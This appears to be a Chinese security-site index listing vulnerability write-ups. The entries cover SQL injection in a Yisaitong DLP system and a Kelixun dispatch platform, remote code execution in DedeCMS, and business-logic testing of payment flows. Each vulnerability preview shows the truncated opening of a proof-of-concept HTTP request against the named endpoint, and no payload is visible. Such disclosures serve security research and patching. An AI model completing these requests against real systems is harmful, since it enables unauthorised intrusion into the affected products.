秃兔
亿赛通数据泄露防护(DLP)系统 NetSecConfigAjax SQL 注入漏洞
POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1Host:Cookie: JSESSIONID=99CEC1B294F4EEEA7AFC46D8D4741917:JSESSIONID=06DCD58EDC037F785605A29CD7425C66Cache-Control: max-age=0Sec-Ch...
福建科立讯通信 指挥调度管理平台 ajax users.php SQL 注入漏洞
POST /app/ext/ajax users.php HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64
DedeCMSV5.7.114后台article_template_rand.php存在远程代码执行漏洞
POST /dede/article_template_rand.php HTTP/1.1Host: 127.0.0.11User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0Accept: text/html,applicati...
【渗透文库】充值缴费场景业务逻辑测试
测试描述:通过抓包工具分析充值缴费场景的接口内容及工作流程,逐条实施案例验证是否存在业务逻辑漏洞。若场景涉及人脸、证书、短信验证码等认证要素,请参考对应的认证要素测试对应的测试前置...
